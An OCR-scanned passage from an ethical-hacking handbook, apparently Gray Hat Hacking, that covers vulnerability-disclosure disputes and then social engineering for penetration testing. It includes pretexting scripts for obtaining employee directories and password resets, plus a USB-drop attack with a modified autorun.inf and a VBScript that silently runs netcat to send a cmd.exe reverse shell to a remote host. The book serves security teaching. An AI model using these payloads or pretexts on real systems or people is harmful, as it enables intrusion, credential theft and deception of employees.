by MBTA. 


2008-07-09 


NXP (formerly Philips 
Semiconductors) 


Radboud University 
Nijmegen 


Mifare Classic 
card chip security 


Research published. 


2007-12-06 


Autonomy Corp., 
PLC 


Secunia 


Key View 

vulnerability 

research 


Research published. 


2007-07-29 


U.S. Customs 


Halvar Flake 


Security training 
material 


Researcher denied 
entry into U.S., 
training cancelled 
last minute. 


2007-04-17 


BeThere (Be Un 
limited) 


Sid Karunaratne 


Publishing ISP 
router backdoor 
information 


Researcher still in 
talks with BeThere, 
passwords redacted, 
patch supplied, 

ISP service not 
restored (2007- 
07-06). 


2007-02-27 


HID Global 


Chris Paget/ 
lOActive 


RFID security 
problems 


Talk pulled, research 
not published. 


2007-??-?? 


TippingPoint 
Technologies, Inc. 


David May nor/ 
ErrataSec 


Reversing 
TippingPoint rule 
set to discover 
vulnerabilities 


Unknown: appears 
threats and FBI visit 
stifled publication. 


2005-07-29 


Cisco Systems, Inc. 


Mike Lynn/I SS 


Cisco router 
vulnerabilities 


Resigned from ISS 
before settlement, 
gave BlackHat 
presentation, future 
disclosure injunction 
agreed on. 


2005-03-25 


Sybase, Inc. 


Next-Generation 
Security Software 


Sybase Database 
vulnerabilities 


Threat dropped, 
research published. 



Table 3-1 Vulnerability Disclosures and Resolutions 
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When 


Company 
Making Threat 


Researchers 


Research 

Topic 


Resolution/ 

Status 


2003-09-30 


Blackboard 
Transaction System 


Billy Hoffman and 
Virgil Griffith 


Blackboard issued 
C&D to InterzOne 
conference, filed 
complaint against 
students 


Confidential 
agreement reached 
between Hoffman, 
Griffith, and 
Blackboard. 


2002-07-30 


Hewlett-Packard 
Development 
Company, L.P. (HP) 


SNOsoft 


Tru64 Unix OS 
vulnerability, 
DMCA-based 
threat 


Vendor/ researcher 
agree on future 
timeline; additional 
Tru64 vulnerabilities 
published; HP asks 
Neohapsis for 
OpenSSL exploit 
code shortly after. 


2001-07-16 


Adobe Systems 
Incorporated 


Dmitry Sklyarov & 
ElcomSoft 


Adobe eBook 
AEBPR Bypass 


ElcomSoft found 
not guilty. 


2001-04-23 


Secure Digital Music 
Initiative (SDMI), 
Recording Industry 
Association of 
America (RIAA) and 
Ve ranee Corporation 


Ed Felten 


Four watermark 
protection 
schemes bypass, 
DMCA-based 
threat 


Research published 
at USENIX 2001. 


2000-08-17 


Motion Picture 
Association of 


2600:The Hacker 
Quarterly 


DVD encryption 
breaking software 


DeCSS ruled “not a 
trade secret.” 



America (MPAA) & (DeCSS) 

DVD Copy Control 
Association (DVD 
CCA) 



C&D stands for cease and desist. 

Table 3-1 Vulnerability Disclosures and Resolutions (continued) 
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Case Studies 

The fundamental issue that this chapter addresses is how to report discovered vulnera- 
bilities responsibly. The issue sparks considerable debate and has been a source of con- 
troversy in the industry for some time. Along with a simple "yes" or "no" to the ques- 
tion of whether there should be full disclosure of vulnerabilities to the public, other 
factors should be considered, such as how communication should take place, what is- 
sues stand in the way of disclosure, and what experts on both sides of the argument are 
saying. This section dives into all of these pressing issues, citing recent case studies as 
well as industry analysis and opinions from a variety of experts. 

Pros and Cons of Proper Disclosure Processes 

Following professional procedures in regard to vulnerability disclosure is a major issue 
that should be debated. Proponents of disclosure want additional structure, more rigid 
guidelines, and ultimately more accountability from vendors to ensure vulnerabilities 
are addressed in a judicious fashion. The process is not so cut and dried, however. There 
are many players, many different rules, and no clear-cut winners. It's a tough game to 
play and even tougher to referee. 

The Security Community’s View 

The top reasons many bug finders favor full disclosure of software vulnerabilities are: 

• The bad guys already know about the vulnerabilities anyway, so why not 
release the information to the good guys? 

• If the bad guys don't know about the vulnerability, they will soon find out 
with or without official disclosure. 

• Knowing the details helps the good guys more than the bad guys. 

• Effective security cannot be based on obscurity. 

• Making vulnerabilities public is an effective tool to use to make vendors 
improve their products. 

Maintaining their only stronghold on software vendors seems to be a common 
theme that bug finders and the consumer community cling to. In one example, a cus- 
tomer reported a vulnerability to his vendor. A full month went by with the vendor ig- 
noring the customer's request. Frustrated and angered, the customer escalated the issue 
and told the vendor that if he did not receive a patch by the next day, he would post the 
full vulnerability on a user forum web page. The customer received the patch within 
one hour. These types of stories are very common and continually introduced by the 
proponents of full vulnerability disclosure. 

The Software Vendors’ View 

In contrast, software vendors view full disclosure with less enthusiasm: 

• Only researchers need to know the details of vulnerabilities, even specific 
exploits. 
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• When good guys publish full exploitable code they are acting as black hats 
and are not helping the situation, but making it worse. 

• Full disclosure sends the wrong message and only opens the door to more 
illegal computer abuse. 

Vendors continue to argue that only a trusted community of people should be privy 
to vims code and specific exploit information. They state that groups such as the AV 
Product Developers' Consortium demonstrate this point. All members of the consor- 
tium are given access to vulnerability information so research and testing can be done 
across companies, platforms, and industries. They do not feel that there is ever a need 
to disclose highly sensitive information to potentially irresponsible users. 

Knowledge Management 

A case study at the University of Oulu titled "Communication in the Software Vulner- 
ability Reporting Process" analyzed how the two distinct groups (reporters and receiv- 
ers) interacted with one another and worked to find the root cause of breakdowns. The 
researchers determined that this process involved four main categories of knowledge: 

• Know-what 

• Know-why 

• Know-how 

• Know-who 

The know-how and know-who are the two most telling factors. Most reporters don't 
know who to call and don't understand the process that should be followed when they 
discover a vulnerability. In addition, the case study divides the reporting process into 
four different learning phases, known as interorganizational learning: 

• Socialization stage When the reporting group evaluates the flaw internally 
to determine if it is truly a vulnerability 

• Externalization phase When the reporting group notifies the vendor 
of the flaw 

• Combination phase When the vendor compares the reporter's claim with its 
own internal knowledge of the product 

• Internalization phase The receiving vendors accepting the notification and 
pass it on to their developers for resolution 

One problem that apparently exists in the reporting process is the disconnect — and 
sometimes even resentment — between the reporting party and the receiving party. Com- 
munication issues seem to be a major hurdle for improving the process. From the case 
study, researchers learned that over 50 percent of the receiving parties who had received 
potential vulnerability reports indicated that less than 20 percent were actually valid. In 
these situations, the vendors waste a lot of time and resources on bogus issues. 
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Publicity The case study at the University of Oulu included a survey that asked the 
question whether vulnerability information should be disclosed to the public, although 
the question was broken down into four individual statements that each group was 
asked to respond to: 

• All information should be public after a predetermined time. 

• All information should be public immediately. 

• Some part of the information should be made public immediately. 

• Some part of the information should be made public after a predetermined 
time. 

As expected, the feedback from the questions validated the assumption that there is 
a decidedly marked difference of opinion between the reporters and the vendors. The 
vendors overwhelmingly feel that all information should be made public after a prede- 
termined time and feel much more strongly about all information being made imme- 
diately public than the receivers. 

The Tie That Binds To further illustrate the important tie between reporters and 
vendors, the study concluded that the reporters are considered secondary stakeholders 
of the vendors in the vulnerability reporting process. Reporters want to help solve the 
problem, but are treated as outsiders by vendors. The receiving vendors often consider 
it to be a sign of weakness if they involve a reporter in their resolution process. The 
concluding summary was that both participants in the process rarely have standard 
communications with one another. Ironically, when asked about ways to improve the 
process, both parties indicated that they thought communication should be more in- 
tense. Go figure! 

Team Approach 

Another study, titled "The Vulnerability Process: A Tiger Team Approach to Resolving 
Vulnerability Cases," offers insight into the effective use of teams within the reporting 
and receiving parties. To start, the reporters implement a tiger team, which breaks the 
functions of the vulnerability reporter into two subdivisions: research and manage- 
ment. The research team focuses on the technical aspects of the suspected flaw, while 
the management team handles the correspondence with the vendor and ensures proper 
tracking. 

The tiger team approach breaks down the vulnerability reporting process into the 
following lifecycle: 

1. Research Reporter discovers the flaw and researches its behavior. 

2. Verification Reporter attempts to re-create the flaw. 

3. Reporting Reporter sends notification to receiver giving thorough details 
about the problem. 

4. Evaluation Receiver determines if the flaw notification is legitimate. 
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5. Repairing Solutions are developed. 

6. Patch evaluation The solution is tested. 

7. Patch release The solution is delivered to the reporter. 

8. Advisory generation The disclosure statement is created. 

9. Advisory evaluation The disclosure statement is reviewed for accuracy. 

10. Advisory release The disclosure statement is released. 

11. Feedback The user community offers comments on the vulnerability/ fix. 

Communication When observing the tendencies of reporters and receivers, the 
case study researchers detected communication breakdowns throughout the process. 

They found that factors such as holidays, time zone differences, and workload issues 
were most prevalent. Additionally, it was concluded that the reporting parties were 
typically prepared for all their responsibilities and rarely contributed to time delays. 

The receiving parties, on the other hand, often experienced lag time between phases 
mostly due to difficulties spreading the workload across a limited staff. This finding 
means the gray hats were ready and willing to be a responsible party in this process but 
the vendor stated that it was too busy to do the same. 

Secure communication channels between reporters and receivers should be estab- 
lished throughout the lifecycle. This requirement sounds simple, but, as the research 
team discovered, incompatibility issues often made this task more difficult than it ap- 
peared. For example, if the sides agree to use encrypted e-mail exchange, they must 
ensure they are using similar protocols. If different protocols are in place, the chances 
of the receiver simply dropping the task greatly increase. 

Knowledge Barrier There can be a huge difference in technical expertise between 
a receiver (vendor )and a reporter (finder), making communication all the more diffi- 
cult. Vendors can't always understand what finders are trying to explain, and finders can 
become easily confused when vendors ask for more clarification. The tiger team case 
study found that the collection of vulnerability data can be quite challenging due to 
this major difference. Using specialized teams with specific areas of expertise is strong- 
ly recommended. For example, the vendor could appoint a customer advocate to inter- 
act directly with the finder. This party would be the middleman between engineers and 
the customer/finder. 

Patch Failures The tiger team case also pointed out some common factors that 
contribute to patch failures in the software vulnerability process, such as incompatible 
platforms, revisions, regression testing, resource availability, and feature changes. 

Additionally, researchers discovered that, generally speaking, the lowest level of 
vendor security professionals work in maintenance positions — and this is usually the 
group who handles vulnerability reports from finders. The case study concluded that a 
lower quality patch would be expected if this is the case. 

Vulnerability Remains After Fixes Are in Place 

Many systems remain vulnerable long after a patch/fix is released. This happens for 
several reasons. The customer is currently and continually overwhelmed with the num- 
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ber of patches, fixes, updates, versions, and security alerts released each and every day. 
This is the motivation behind new product lines and processes being developed in the 
security industry to deal with "patch management." Another issue is that many of the 
previously released patches broke something else or introduced new vulnerabilities 
into the environment. So although we can shake our fists at network and security ad- 
ministrators who don't always apply released fixes, keep in mind the task is usually 
much more difficult than it sounds. 



Vendors Paying More Attention 

Vendors are expected to provide foolproof, mistake-free software that works all the 
time. When bugs do arise, they are expected to release fixes almost immediately. It is 
truly a double-edged sword. However, the common practice of "penetrate and patch" 
has drawn criticism from the security community as vendors simply release multiple 
temporary fixes to appease users and keep their reputations intact. Security experts ar- 
gue that this ad-hoc methodology does not exhibit solid engineering practices. Most 
security flaws occur early in the application design process. Good applications and bad 
applications are differentiated by six key factors: 

• Authentication and authorization The best applications ensure that 
authentication and authorization steps are complete and cannot be 
circumvented. 

• Mistrust of user input Users should be treated as "hostile agents" as data 
is verified on the server side and strings are stripped of tags to prevent buffer 
overflows. 

• End-to-end session encryption Entire sessions should be encrypted, not 
just portions of activity that contain sensitive information. In addition, secure 
applications should have short timeout periods that require users to re- 
authenticate after periods of inactivity. 

• Safe data handling Secure applications will also ensure data is safe while 
the system is in an inactive state. For example, passwords should remain 
encrypted while being stored in databases and secure data segregation should 
be implemented. Improper implementation of cryptography components 
have commonly opened many doors for unauthorized access to sensitive data. 

• Eliminating misconfigurations, backdoors, and default settings A 

common but insecure practice for many software vendors is to ship software 
with backdoors, utilities, and administrative features that help the receiving 
administrator learn and implement the product. The problem is that these 
enhancements usually contain serious security flaws. These items should 
always be disabled and require that the customer enable them, and all 
backdoors should be properly extracted from source code. 

• Security quality assurance Security should be a core discipline when 
designing the product, during specification and development phases, and 
during testing phases. Vendors who create security quality assurance teams 
(SQA) to manage all security-related issues are practicing due diligence. 
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So What Should We Do from Here on Out? 

We can do several things to help improve the security situation, but everyone involved 
must be more proactive, better educated, and more motivated. The following are some 
items that should be followed if we really want to make our environments more secure: 

• Act up It is just as much the consumers' responsibility, as it is the 
developers', to ensure a secure environment. Users should actively seek 
out documentation on security features and ask for testing results from 
the vendor. Many security breaches happen because of improper customer 
configurations. 

• Educate application developers Highly trained developers create more 
secure products. Vendors should make a conscious effort to train their 
employees in the area of security. 

• Access early and often Security should be incorporated into the design 
process from the early stages and tested often. Vendors should consider 
hiring security consulting firms to offer advice on how to implement security 
practices into the overall design, testing, and implementation processes. 

• Engage finance and audit Getting the proper financing to address security 
concerns is critical in the success of a new software product. Engaging budget 
committees and senior management at an early stage is critical. 

iDefense and ZDI 

iDefense is an organization dedicated to identifying and mitigating software vulnera- 
bilities. Founded in August 2002, iDefense started to employ researchers and engineers 
to uncover potentially dangerous security flaws that exist in commonly used computer 
applications throughout the world. The organization uses lab environments to re-create 
vulnerabilities and then works directly with the vendors to provide a reasonable solu- 
tion. iDefense's Vulnerability Contributor Program (VCP) has pinpointed more than 
10,000 vulnerabilities, of which about 650 were exclusively found by iDefense, within 
a long list of applications. They pay researchers up to $15,000 per vulnerability as part 
of their main program. 

The Zero-Day Initiative (ZDI) has joined iDefense in the vulnerability reporting 
and compensation arena. ZDI, founded by the same people who founded iDefense's 
VCP, claims 1,179 researchers and more than 2,000 cases have been created since their 
August 2005 launch. 

ZDI offers a web portal for researchers to report and track vulnerabilities. They per- 
form identity checks on researchers who report vulnerabilities, including checking that 
the researcher isn't on any government "do not do business with" lists. ZDI then vali- 
dates the bug in a security lab before offering the researcher a payment and contacting 
the vendor. ZDI also maintains its Intrusion Prevention Systems (IPS) program to write 
filters for whatever customer areas are affected by the vulnerability. The filter descrip- 
tions are designed to protect customers, but remain vague enough to keep details of the 
unpatched flaw secret. ZDI works with the vendor on notifying the public when the 
patch is ready, giving the researcher credit if he or she requests it. 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 




Chapter 3: Proper and Ethical Disclosure 

73 



These global security companies have drawn skepticism from the industry, however, 
as many question whether it is appropriate to profit by searching for flaws in others' 
work. The biggest fear here is that the practice could lead to unethical behavior and, 
potentially, legal complications. In other words, if a company's sole purpose is to iden- 
tify flaws in software applications, wouldn't the goal be to find more and more flaws 
over time, even if the flaws are less relevant to security issues? The question also re- 
volves around the idea of extortion. Researchers may get paid by the bugs they find — 
much like the commission a salesman makes per sale. Critics worry that researchers will 
begin going to the vendors demanding money unless they want their vulnerability dis- 
closed to the public — a practice referred to as a "finder's fee." Many believe that bug 
hunters should be employed by the software companies or work on a voluntary basis 
to avoid this profiteering mentality. Furthermore, skeptics feel that researchers discover- 
ing flaws should, at a minimum, receive personal recognition for their findings. They 
believe bug finding should be considered an act of good will and not a profitable en- 
deavor. 

Bug hunters counter these issues by insisting that they believe in full disclosure 
policies and that any acts of extortion are discouraged. In addition, they are often paid 
for their work and do not work on a bug commission plan as some skeptics have al- 
luded to. So, as you can see, there is no lack of controversy or debate pertaining to any 
aspect of vulnerability disclosure practices. 
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CHAPTER 



Social Engineering Attacks 



Social engineering is a way to get someone to do something they wouldn't normally do 
for you, such as give you a private telephone number or internal confidential informa- 
tion, by creating a false trust relationship with them. It's no different from a common 
confidence game, also known as a "con, " played by criminals the world over every day. 
You could even go as far as to say that the Greek's Trojan horse was an early act of social 
engineering. That it successfully put the Greek army inside the city of Troy in mere 
hours after ten years of siege had failed is worth noting. The Greeks were able to deci- 
sively defeat the Trojans in one evening once inside the city wall, a theme often re- 
peated on the digital battlefield today. 

In this chapter, we're going to talk about social engineering in the context of modern 
information security practice. You're going to learn how to perform social engineering 
so that you are better prepared to defend against it. Like so many techniques in this 
book, the only thing that separates the gray hat hacker from a common criminal is 
ethical behavior. This is especially true for social engineering, as it is arguably one of the 
most powerful ways to gain access to your target's information assets. 

In this chapter, we cover the following topics: 

• How a social engineering attack works 

• Conducting a social engineering attack 

• Common attacks used in penetration testing 

• Preparing yourself for face-to-face attacks 

• Defending against social engineering attacks 

How a Social Engineering Attack Works 

Social engineering attacks cover a wide range of activities. Phishing, for instance, is a 
social engineering attack (SEA). The victim receives a legitimate-looking e-mail, follows 
a link to a legitimate-looking website they're familiar with, and often divulges sensitive 
information to a malicious third party. As end users are made aware of such activities, 
the attacks generally must become more sophisticated in order to remain effective. Re- 
cently, attacks of this nature have become narrowly targeted at specific companies, of- 
ten mimicking internal system logins and targeting only individuals working at the 
subject company. It's an electronic numbers game conducted from afar, and the reason 
it is so common is that it works! 



77 



Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

78 



At the heart of every SEA is a human emotion, without which the attacks will not 
work. Emotion is what derails security policy and practices, by leading the human user 
to make an exception to the rules for what they believe is a good reason. Commonly 
exploited simple emotions, and an example of how each is exploited, include: 

• Greed A promise you'll get something very valuable if you do this one thing 

• Lust An offer to look at a sexy picture you just have to see 

• Empathy An appeal for help from someone impersonating someone you 
know 

• Curiosity Notice of something you just have to know, read, or see 

• Vanity Isn't this a great picture of you? 

These emotions are frequently used to get a computer user to perform a seemingly 
innocuous action, such as logging into an online account or following an Internet URL 
from an e-mail or instant messaging client. The actual action is one of installing mali- 
cious software on their computer or divulging sensitive information. 

Of course, there are more complex emotions exploited by more sophisticated social 
engineers. While sending someone an instant message with a link that says "I love this 
photo of you" is a straightforward appeal to their vanity, getting a secretary to fax you 
an internal contact list or a tech support agent to reset a password for you is quite a dif- 
ferent matter. Attacks of this nature generally attempt to exploit more complex aspects 
of human behavior, such as 

• A desire to be helpful "If you're not busy, would you please copy this file 
from this CD to this USB flash drive for me?" Most of us are taught from 
an early age to be friendly and helpful. We take this attitude with us to the 
workplace. 

• Authority/conflict avoidance "If you don't let me use the conference room 
to e-mail this report to Mr. Smith, it'll cost the company a lot of money and 
you your job." If the social engineer looks authoritative and unapproachable, 
the target usually takes the easy way out by doing what's asked of them and 
avoiding a conflict. 

• Social proof "Hey look, my company has a Facebook group and a lot 
of people I know have joined." If others are doing it, people feel more 
comfortable doing something they wouldn't normally do alone. 

No matter what emotional button the attacker is attempting to push, the premise is 
always the same: the intended victim will not sense the risk of their action or guess the 
real intentions of the attacker until it's too late or, in many cases, not at all. Because the 
intended victims in these cases most often are working on computers inside of the tar- 
get company network, getting them to run a remote access program or otherwise grant 
you remote access directly or indirectly can be the fast track to obtaining targeted sensi- 
tive data during a penetration test. 
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Conducting a Social Engineering Attack 

It is important to discuss with your client your intention to conduct social engineering 
attacks, whether internal or external, before you include them in a penetration test's 
project scope. A planned SEA could be traumatic to employees of the target company if 
they are made aware of the findings in an uncontrolled way, because they might feel 
just as victimized as they would if subjected to a real attack. If you are caught during 
this activity, you most likely will not be treated as if you're "on the same team" by the 
intended victim. Often, the victim feels as if they've been made a fool of. 

The client should be made aware of the risks associated with contracting a third 
party who plans to overtly lie to and manipulate company employees to do things that 
are clearly against the rules. That said, most companies do accept the risk and see the 
value of the exercise. Secrecy must also be stressed and agreed upon with the client 
prior to engaging in a covert exercise like this. If the employees know that there will be 
a test of any kind, they will of course act differently. This will prevent the penetration 
testing team from truly learning anything about the subject organization's true security 
posture. 

Like all penetration testing, an SEA begins with footprinting activity and reconnais- 
sance. The more information you collect about the target organization, the more op- 
tions become available to you. It's not uncommon to start with zero knowledge and use 
information gained through open sources to mount a simple SEA — get the company 
phone directory, for instance — and then use the new knowledge to mount increasingly 
targeted and sophisticated SEAs based on the newly gained insight into the company. 

While dumpster diving is a classic example of a zero knowledge starting point for 
finding information about a target, there are more convenient alternatives. Google is 
probably the most effective way to start finding names, job titles, contact information, 
and more. Once you have a list of names, start combing through social media sites such 
as Facebook, Linkedln, MySpace, and Twitter. Finding employees with accounts on 
popular social media sites is a common practice among social engineers. Often, those 
employees will be connected to other people they work with and so on. Depending on 
their security settings, their entire network of connections may be visible to you, and 
you may be able to identify coworkers easily. 

In the case of business networking sites like Linkedln, the information collection is 
made even easier for you because you can search by company name to find past and 
present employees of your target. On any social networking site, you may also find a 
group for current and ex-employees of a company. Industry-specific blog and board sites 
can also yield useful information about internal employee issues currently being dis- 
cussed. Often these posts take the form of anonymous gripes, but they can be useful for 
demonstrating insider knowledge when striking up a conversation with your target. 

Using such passive methods to collect as much information about a company as 
possible is a great place to start formulating your attack. We'll cover some useful ways 
to use social media in an actual attack scenario later in this chapter. 

Social engineering is most successful as a team effort due to the wide variety of cir- 
cumstances and opportunities that may arise. At the very least, two people will be needed 
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for some of the examples detailed later in this chapter. While natural charisma is a 
prized resource, a practiced phone voice and the ability to discuss convincingly a wide 
variety of not necessarily technical social topics will get you pretty far down the road. 

The ability to write convincingly also is important, as is your physical appearance 
should you perform face-to-face attacks or impersonations. As all of these activities are 
designed to gain unauthorized access to data assets, you must also possess the hacking 
skills described in this book, or at least be intimately familiar with what is possible in 
order to help your team get into position on the network to use them. 

A good place to start your reconnaissance after researching the company online is 
to begin targeting people of interest internally in an attempt to build a picture of who 
is who and, if possible, develop rapport with potential sources. Key personnel might 
include the CIO, CSO, Director of IT, CFO, Director of HR, VPs, and Directors of any 
sort. All of these individuals will have voicemail, e-mail, secretaries, and so forth. Know- 
ing who works in which offices, who their personal assistants are, and when they're 
traveling or on vacation might not seem worthwhile, but it is. Let's say the goal is to 
obtain the internal employee directory. By knowing when someone is out of the office, 
you can call their assistant and claim that you are a consultant working with their boss 
and that you need the company directory printed out and faxed to you at another loca- 
tion within the company. Since the assistant will be faxing internally, they won't see any 
risk. At this point, they may even ask you if they can e-mail the directory to you, in 
which case your SEA is a success, but let's assume they don't ask and fax the directory to 
the other office you claim to be working in. You can then call that office, give the story 
again, and ask that the fax be sent to you at home. You then give them a public fax 
number and retrieve your fax. 

This is a prime example of escalation of trust. The first victim felt no risk in sending 
something internally. The second victim felt comfortable with the pretext because you 
demonstrated knowledge of internal operations, and they don't see any harm in pass- 
ing along a directory. With the directory in hand, you can now use caller ID spoofing 
services such as Bluff My Call to appear to be calling from inside the company. The next 
move is up to you! If the company is like most companies, its network user IDs aren't 
hard to figure out, or maybe you've already figured out that format from the IT guy you 
tried to sell an identity management product to on the phone or over a game of pool at 
the bar you know he goes to from his overly permissive Facebook page. You can now 
call tech support from inside and have a vacationing VP of HR's password reset so you 
can use the virtual private network (VPN) remotely. 

Planning an attack takes time, practice, and, above all, patience. Since you're the 
attacker, you're limited only by your imagination. Your success or failure will depend 
on your team's ability to read the people who work at the target organization and de- 
vise an attack or series of escalating attacks that is effective against them. Keep in mind 
that it's a game of capture the flag, and your goal is to access sensitive data to demon- 
strate to your client how it can be done. Sometimes the goal is obtained without any 
traditional technical hacking, by using legitimate access methods and stolen or errone- 
ously granted credentials. In other cases, a stolen backup tape will yield everything you 
need. In most cases, however, it is the combined effort of getting the team hacker(s) in 
position or delivering the desired remote access payload behind the network border 
controls. 
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As your attacks become more sophisticated, you may also be required to set up 
phony websites, e-mail addresses, and phone numbers in order to appear to be a le- 
gitimate company. Thanks to the proliferation of web-based micro businesses and pay- 
as-you-go mobile phones, this is now as inexpensive as it is trivial. You may also be 
required to meet face to face with the intended victim for certain types of attacks. We'll 
talk about these subjects in more detail in the following sections. 

Reference 

Bluff My Call www.bluffmycall.com 

Common Attacks Used in Penetration Testing 

In this section, we're going to discuss a few formulaic SEAs that are commonly used in 
everyday penetration testing. It is important to keep in mind that these attacks may not 
work every time or work on your specific target, as each environment is different. In 
fact, the conditions required for any attack to succeed often need to be just right; what 
didn't work today may well work tomorrow, and vice versa. The examples in the previ- 
ous section are hypothetical and primarily designed to help you start thinking like a 
social engineer, to give you examples of possible starting points. In the following ex- 
amples, we'll cover a few attacks that have been repeatedly performed with success. As 
these attacks are part of a larger penetration test, we'll only cover the social engineering 
portion of the attack. Often the SEA is one step removed from, and immediately pre- 
ceding, physical access, which is covered in Chapter 5. 

The Good Samaritan 

The goal of this attack is to gain remote access to a computer on the company network. 

This attack combines SEA techniques with traditional hacking tools. The basic 
premise is that a specially prepared USB drive is presented to the target company's front 
desk or most publicly accessible reception area. A very honest-looking person in ap- 
propriate attire — a business suit if it's an office, for example — hands the employee at 
the front desk the USB drive, claiming to have found it on the ground outside. The pre- 
text will change with the specific circumstances; for instance, if the office is one floor in 
a high rise, you might say you found the USB drive in the elevator, or if it's a secured 
campus, you may dress like a landscaper and say you found it on the campus grounds. 
The USB drive should look used, have the company name on it, and be labeled with, 
for example, "HR Benefits" and the current year. What you write on the label of the key 
is up to you. You're trying to bait an employee to plug it into a computer, something 
they may know they shouldn't do, so the reward must seem greater than the risk of vio- 
lating policy. It should whisper "interesting" but not be too obvious. For instance, "Cost 
Cuts 2010" is a good label, but "Nude Beach" probably isn't. When the USB drive is 
plugged in, it attempts to install and run a remote access Trojan and pass a command 
prompt out to your team across the public Internet. Obviously, what you have the key 
run is completely up to you. In this example, we'll focus on a very simple remote com- 
mand prompt. 
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Putting this attack together is fairly academic insofar as the main work is in the 
preparation of the USB drive. The delivery is trivial and can be attempted multiple 
times and at multiple target locations. For this attack to work, the target environment 
must allow the use of USB drives and must have autorun enabled. Despite the fact that 
these two vulnerabilities are widely known and it is considered a best practice to dis- 
able or at least actively manage both, this attack is still remarkably effective. Preparing 
the USB drive to autorun your payload is a fairly straightforward process as well. For 
this example, you'll need 

• A USB drive; in this example, we'll use an inexpensive SanDisk Cruzer Micro 
drive. 

• A tool to edit an ISO image file; in this example, we'll use ISO Commander. 

• A tool from the manufacturer to write the new ISO image to the drive; in this 
example, we'll use the SanDisk U3 Launchpad, LPInstaller.exe. 

• A remote access Trojan; in this example, we'll simply use a Windows version 
of netcat. 

There are prepackaged kits, such as USB Switchblade and USB Hacksaw, that do a 
lot of the work for you, but they're also widely known by antivirus companies. To re- 
duce the risk of being detected, it's better to make your own routine. 

In this example, we're going to use a 1GB SanDisk Cruzer Micro with U3 model. 
Start by downloading the Launchpad Installer application, LPInstaller.exe, from the 
SanDisk website. You'll find it under the Support section by using the Find Answers 
search box. This application will download the default U3 ISO image from the SanDisk 
website and install it on the flash drive. We're going to trick it into installing an ISO 
image we've modified so that when the USB drive is plugged into the target machine, it 
runs code we specify in addition to the U3 Launchpad application. 

Once you have the LPInstaller.exe application downloaded, execute it. If you have 
a personal firewall that operates with a white list, you may have to allow the applica- 
tion access to the Internet. You 
must be connected to the Inter- 
net in order for the application 
to download the default ISO 
image from SanDisk. After the 
application runs, it will require 
you to plug in a compatible de- 
vice before it will allow you to 
continue. Once it recognizes a 
compatible device, you can click 
Next until you get to the final 
screen before it writes the image 
to the flash drive. It should look 
like this: 



9 U3 Launchpad Installer 



Confirm Installation Uptions 

Verify your rhnir.es hefnre installation herjns 



u 3 t 



m 



You have choeen the following opbonc: 

• On not hark of) existing data All Hala wl he destroyed 

• Install U3 Launchpad on DA 



I otal bsbmated I tme: 1 minute l seconds 

Click "Bock" if yaru want lu chanye (tiese uptime. 
Tu continue. Click "Next" 
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The moment the LPInstaller.exe application detected a compatible flash drive, it began 
downloading the default U3 ISO image from the SanDisk website. This image is tempo- 
rarily stored on the user PC in the Application Data section of the current user's Docu- 
ments and Setting directory in a folder called U3. The U3 folder has a temp folder that 
contains a unique session folder containing the downloaded ISO file, as shown here: 




You must wait until the ISO image completely downloads before you can edit it. In 
this case, it's rather small, finishing up at just over 7MB. Once it's completely down- 
loaded, we'll use an ISO editing utility to add our own files to the ISO image before we 
allow the LPInstaller application to save it to the flash drive. In this example, we'll use 
a simple ISO editing tool called ISO Commander, a copy of which can be freely down- 
loaded from the location specified at the end of this section. Open ISO Commander, 
navigate to the U3 data directory, and select the downloaded ISO file, which is Pelican- 
BFG-autorun.iso in this case. Since we'll need to install our own version of autorun. inf, 
it's convenient to simply extract and modify the autorun.inf file that came with the ISO 
image. Simply right-click the autorun.inf file and select Extract, as shown next, and then 
save it to another location for editing. 
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Extracting the default autorun.inf file is simple and contains only a few directives. 

In this example, we will replace the executable call with a script of our own. Our script 
will perform an attack using netcat to push a command shell to a remote computer, 
and then execute the originally specified program, LaunchU3.exe, so that the userwon't 
notice any abnormal behavior when they plug the USB drive in. The unedited autorun. 
inf file is as follows: 

[AutoRun] 

open=wscript LaunchU3.exe -a 
icon=LaunchU3 . exe, 0 
action=Run U3 Launchpad 
[Definitions ] 

Launchpad=LaunchPad . exe 

Vtype=2 

[CopyFiles] 

FileNumber=l 
Filel=LaunchPad. zip 
[Update] 

URL=http : //u3 . sandisk . com/ download/ lp_installer . asp?custom=l .6.1. 2&brand=PelicanBFG 
[Comment] 
brand=PelicanBFG 

For our purposes, we'll only edit the second line of this file and change it from 

open=wscript LaunchU3.exe -a 

to 

open=wscript cruzer/go . vbs 

When the autorun.inf file is executed on insertion of the device, our go.vbs script 
will run instead of the LaunchU3.exe application. We'll put it in a directory called cru- 
zer along with the netcat binary nc.exe in an attempt to make it slightly less noticeable 
at a casual glance. Next we need to create our go.vbs script. Since we're just demonstrat- 
ing the technique, we'll keep it very simple, as shown next. The script will copy the 
netcat binary to the Windows temp directory and then execute the netcat command 
with options to bind a cmd.exe command shell and pass it to a remote computer. 

'This prevents the script from throwing errors in the event it has trouble 
On Error Resume Next 

set objShell = WScript . CreateObj ect ("WScript. Shell") 

'Get the location of the temp directory 

temp=obj Shell . ExpandEnvironmentStrings ( "%temp%" ) 

'Get the location of the Windows Directory 

windir=obj Shell .ExpandEnvironmentStrings ("%windir%" ) 

set f ilesys=CreateObject ( "Scripting. FileSystemObj ect" ) 

'Copy our netcat into the temp directory of the target 

f ilesys . CopyFile "cruzer\nc.exe", temp & "\" 

'Wait to make sure the operation completes 
WScript . Sleep 5000 

'Throw a command prompt to the waiting remote computer, a local test in this case. 

'The 0 at the end of the line specifies that the command box NOT be displayed to 
'the user. 

objShell. Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106 

443", 0 

'Execute the application originally specified in the autorun.inf file 
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The preceding script is documented step by step in the comments. VBScript is used 
as opposed to batch fdes because it gives more control over what the user sees on the 
screen. This example is configured to run silently even if it encounters multiple errors 
and cannot continue. It uses Windows environment variables to determine where the 
Windows directory is so that it can easily find the command shell binary cmd.exe on 
multiple versions of Windows. It uses the same technique to determine the default 
Window temp directory. 

Now that we have our autorun. inf file modified and our go.vbs script written, it's 
time to put them into the ISO file the LPInstaller application is about to write to the 
flash drive. Using the ISO Commander application with the LPInstaller ISO file still 
open, drag and drop the edited autorun. inf file into the root of the image file system. 
Then, using either a right-click, the toolbar, or pull-down menus, create a new folder 
named cruzer. In ISO Commander, each method creates a folder titled New Folder, 
which must be renamed. Drag and drop the go.vbs and nc.exe files into the cruzer di- 
